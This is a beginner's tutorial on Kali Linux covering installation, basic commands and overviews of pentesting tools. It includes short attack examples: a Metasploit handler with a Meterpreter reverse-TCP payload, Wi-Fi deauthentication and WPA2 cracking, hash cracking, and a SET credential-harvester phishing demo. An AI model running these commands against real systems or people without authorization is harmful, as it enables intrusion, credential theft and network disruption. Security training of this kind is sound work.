Kali Linux Tutorial – Complete Guide for Beginners
1. Introduction to Kali Linux
Kali Linux is a Debian-based Linux distribution designed for penetration testing, ethical hacking, and cybersecurity. It comes pre-installed with 600+ security tools for vulnerability analysis, forensics, and network security.
✅ Who Should Use Kali Linux?
✔ Ethical Hackers
✔ Cybersecurity Professionals
✔ IT Administrators
✔ Bug Bounty Hunters
2. Installing Kali Linux
Option 1: Bare Metal Installation (Direct Install)
Download Kali Linux from kali.org
Create a Bootable USB using:
Windows: Rufus
Linux/macOS:
ddcommandsudo dd if=kali-linux.iso of=/dev/sdX bs=4M status=progress
Boot from USB and follow the installer.
Option 2: Virtual Machine (Recommended for Beginners)
VMware/VirtualBox:
Download Kali Linux VM Image from Offensive Security
Import into VMware Workstation or VirtualBox.
Option 3: WSL (Windows Subsystem for Linux)
Run Kali Linux inside Windows:
wsl --install -d kali-linux
3. Kali Linux Basics
Default Credentials
Username:
kaliPassword:
kali
Update & Upgrade
sudo apt update && sudo apt full-upgrade -y
Essential Commands
| Command | Description |
|---|---|
sudo su | Switch to root |
apt install <package> | Install software |
ifconfig / ip a | Check network interfaces |
nmap | Network scanning |
msfconsole | Launch Metasploit |
4. Penetration Testing Tools in Kali Linux
A. Information Gathering
| Tool | Purpose |
|---|---|
| Nmap | Network scanning & port discovery |
| Maltego | OSINT (Open-Source Intelligence) |
| Recon-ng | Web reconnaissance |
Example: Nmap Scan
nmap -sV 192.168.1.1 # Scan a target IP
B. Vulnerability Analysis
| Tool | Purpose |
|---|---|
| Nikto | Web server scanner |
| OpenVAS | Vulnerability assessment |
| Burp Suite | Web app security testing |
Example: Nikto Scan
nikto -h http://example.com
C. Exploitation Tools
| Tool | Purpose |
|---|---|
| Metasploit Framework | Exploit development |
| SQLmap | SQL injection attacks |
| Hydra | Password cracking |
Example: Metasploit
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your-ip> exploit
D. Password Attacks
| Tool | Purpose |
|---|---|
| John the Ripper | Password cracking |
| Hashcat | GPU-accelerated cracking |
| Crunch | Wordlist generator |
Example: Crack a Hash with John
john --format=md5 hashes.txt
E. Wireless Attacks
| Tool | Purpose |
|---|---|
| Aircrack-ng | Wi-Fi cracking |
| Wifite | Automated Wi-Fi attacks |
| Kismet | Wireless detection |
Example: WPA2 Cracking
airmon-ng start wlan0 airodump-ng wlan0mon aireplay-ng --deauth 10 -a <AP-MAC> wlan0mon aircrack-ng -w rockyou.txt capture.cap
5. Ethical Hacking Example: Phishing Attack (Demo)
Step 1: Set Up a Fake Login Page
sudo apt install setoolkit sudo setoolkit
Select Social-Engineering Attacks
Choose Website Attack Vectors
Pick Credential Harvester
Step 2: Send Phishing Email (Optional)
Use GoPhish or SocialFish.
Step 3: Monitor Captured Credentials
Check logs in
/var/www/html/
⚠ Note: Only use this for legal, authorized testing!
6. Kali Linux Customization
Change Default Password
passwd
Install Additional Tools
sudo apt install -y metasploit-framework burpsuite wireshark
Enable SSH for Remote Access
sudo systemctl enable ssh --now
7. Kali Linux Best Practices
✔ Use a VPN for anonymity (e.g., openvpn).
✔ Never use Kali as a daily OS (use a VM instead).
✔ Stay updated (sudo apt update weekly).
✔ Follow legal guidelines (only hack authorized systems).
8. Next Steps
🚀 Try CTF Challenges (HackTheBox, TryHackMe)
🚀 Learn Bash & Python Scripting for automation
🚀 Explore Advanced Exploits (Zero-Days, Buffer Overflows)
